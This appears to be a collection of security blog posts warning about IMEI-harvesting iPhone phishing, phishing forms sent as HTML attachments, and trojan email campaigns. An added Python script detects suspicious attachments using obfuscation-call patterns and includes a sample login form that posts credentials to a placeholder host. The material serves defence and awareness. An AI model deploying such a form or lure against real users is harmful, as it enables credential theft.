Just when I've written about a new kind of phishing which can bypass pretty much all known anti-phishing methods, along comes not so much another type, but another target.

Rather than targeting bank users, this one is targeting cellphone accounts.

(Image: Apple iPhone phish email thumbnail)

The email I received was an image, designed to look like a text email from Apple. It claimed that registering your phone by following the link would extend your warranty by 1 year.

This is, of course, designed to look exactly like an Apple-themed email would.

When you click on the link in the image, or in fact, anywhere on the image at all, it takes you to a web page with a form on it.

(Image: Apple iPhone phish website form)

This form, again, is on an Apple-themed page, with many links on the page going directly to Apple's website. Undoubtedly, this page formatting code was lifted directly from Apple and modified slightly to direct your data to the scammer.

The form asks for 4 pieces of information, although probably only 2 are really necessary to the scammer.

The most important one is the IMEI number.  This is the number which uniquely identifies your phone to the phone company.  Unfortunately, this number can be cloned to a new phone.  That's exactly what these phishers will be trying to do, I'd guess.

If they get a legitimate IMEI number, they can clone it to another phone, then burn up your local minutes, or make long distance calls around the world for free, and it won't be noticed for another month, until you get your next phone bill. Add in a couple of weeks or more of haggling with the phone company, and they've probably got two months of free phone calls.

It could very well be that they're selling these cloned phones on the black market, claiming that service is paid up for a number of months.

It's also possible that they would use these cloned phones to listen to your phone conversations, hoping to gain more personal information to use for more serious identity theft, although that would be much more labour intensive than I would think would be worthwhile.

Phishing is the practice of sending fake emails, claiming to be from a bank, credit card company, or some other such organization that has personal information.

These emails usually claim that your account has been limited, or information needs to be updated, or some other reason that you need to go log into the site and correct the problem.

The email then contains a link taking you to the site purportedly belonging to the organization, which is, in fact, a site owned by the scammer.  Your information, credit card details, bank username and password, or other private information is then given to the scammer, if you fill out the form and click the submit button.

To combat this activity, security industry players have created databases of known phishing sites, such as http://www.phishtank.com, which web browsers and security software can use to verify sites that you visit.  These databases have a method to submit new phishing sites, which I have done myself, which are then checked and verified by other users, and in turn used to warn visitors to the phishing site that it is not legitimate.

As with anything in the security industry, though, this is a game of one-upmanship. To bypass the online databases of phishing sites, the phishers are now using a new tactic, which I've noticed a couple of times in the past month. Undoubtedly, this method will grow in popularity, due to the difficulty of controlling it.

What the phishers are now doing, instead of emailing a link to a fake online login form, is to email the entire form itself.  The form shows as an attachment to an email, which, when clicked, opens in your web browser, just the same as a regular phishing site.  What is different, though, is instead of being loaded from http://www.phishers.com/FakePayPalLogin/, enabling your browser's phishing protection to warn you, it's loaded directly from your own computer.

A local file, loaded from your own computer, is assumed to be safe. In fact, a local file has to be assumed safe, or various components of Windows would break, due to the way Microsoft has chosen to integrate these components.

The form is a pure HTML document, like a web page, which simply directs the form data to a malicious server, set up to harvest data from victims. In one case, I've seen it encoded using JavaScript to be difficult to analyze.

At this point, I can't think of a way to handle this.  The only real way to find dangerous files on your own computer is through antivirus and antispyware software.  But since the form is simply an HTML web page, with no dangerous content, it's very difficult, if not impossible, for antivirus software to detect.
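As an added illustration (not code from the original post), here is a small Python script that takes the defender's view of the technique described above: it parses an HTML attachment and flags a form that posts to an absolute http(s) URL, a password field inside that form, and JavaScript calls commonly used to obscure the form's real target. The sample attachment and its placeholder host are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# JavaScript calls typically used to hide a form's real target.
OBFUSCATION = re.compile(r"\b(unescape|eval|document\.write)\s*\(", re.I)

class FormAudit(HTMLParser):
    # Collects forms that post off-machine, password fields and inline script.
    def __init__(self):
        super().__init__()
        self.remote_actions = []       # absolute http(s) form targets
        self.password_in_form = False  # password field inside such a form
        self.script_text = []          # inline <script> bodies
        self.in_form = self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.in_form = True
            if urlparse(a.get("action") or "").scheme in ("http", "https"):
                self.remote_actions.append(a["action"])
        elif tag == "input" and self.in_form and (a.get("type") or "").lower() == "password":
            self.password_in_form = True
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        self.in_form = self.in_form and tag != "form"
        self.in_script = self.in_script and tag != "script"

    def handle_data(self, data):
        if self.in_script:
            self.script_text.append(data)

def audit_attachment(html):  # indicators found in one HTML attachment
    p = FormAudit()
    p.feed(html)
    p.close()
    return {"remote_form_targets": p.remote_actions,
            "asks_for_password": p.password_in_form,
            "obfuscated_js": bool(OBFUSCATION.search("".join(p.script_text)))}

def is_suspicious(html):  # remote-posting form that wants a password or hides its JS
    r = audit_attachment(html)
    return bool(r["remote_form_targets"]) and (r["asks_for_password"] or r["obfuscated_js"])

# Constructed sample attachment (placeholder host, not a real one).
SAMPLE = """<html><body><form method="post" action="http://collector.example.invalid/login.php">
<input name="user"><input type="password" name="pass"><input type="submit" value="Log In">
</form><script>document.write(unescape("%3Cp%3EWelcome%3C%2Fp%3E"));</script></body></html>"""
```

A mail gateway could run audit_attachment over every .htm/.html attachment and quarantine those where is_suspicious is true, which catches the local-file case that URL blocklists miss.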

It will be interesting to see what the security industry comes up with to combat this, and I'll be working on the problem myself, also.  In the meantime, keep an eye out for such attachments supposedly coming from these types of sites.

Another new email virus is making the rounds of inboxes.

This one comes with a subject line of:

get back to my office for more details

and the body text is:

Please read the attached letter and get back to my office for more details to
proceed further.

Thanks and have a very nice day.

The attachment is a zip file of 28 kilobytes.

This one has a reasonably good detection rate at virustotal.com, of 75%.

(Image: virustotal.com scan results)

All the major antivirus engines detect it, with the exception of Sunbelt (producer of CounterSpy).

That means anybody with up to date antivirus should be safe, provided it's working properly.

This trojan will turn your computer into a spam relay, and steal email addresses from various files on your computer. There is the possibility of other activities, as it does embed itself into Internet Explorer, meaning it could be used to steal usernames and passwords for sensitive sites like banks. It also downloads and executes programs from Internet servers, so it could easily upgrade its capabilities in the future.

If you get an email claiming that you've won a Macbook Air, don't believe it.

It's another email virus; this time, a variant of the Zbot trojan.


There are other reports on the Internet about a virus-laden message with the exact same text, but it's not the same virus.  That one is detected by over 70% of virus scanners.  This one is detected by only 30%.


The subject line of the email is short, merely:

Congratulations

The body text of the email is:

Congratulations!! You have won todays Macbook Air.
Please open attached file and see datails.


Notice the spelling mistake in "datails."

The attachment shows as a 103 kilobyte zip file.


This trojan appears to be an encrypted version of the original ZBot, which was designed to steal passwords for banking and other financial sites.


Another email virus/trojan, only this time, it's designed to steal banking information.


This one arrives in an email with the subject line:


UPS Invoice 5305325782943

and has the body text:


Unfortunately we were not able to deliver postal package you send on October the 1st
in time because the recipients address is not correct.
Please print out the invoice cioy attached and collect the package at our office

Your UPS


Although at first glance this looks to be another variant of the FakeRean trojan discussed here, the malicious payload is completely different. This one is designed to monitor keystrokes entered into certain bank websites. This will, of course, allow capture of usernames and passwords, which are then transferred to a server under the control of the trojan author.

This will allow the attacker to log in to your bank account, and transfer money out.
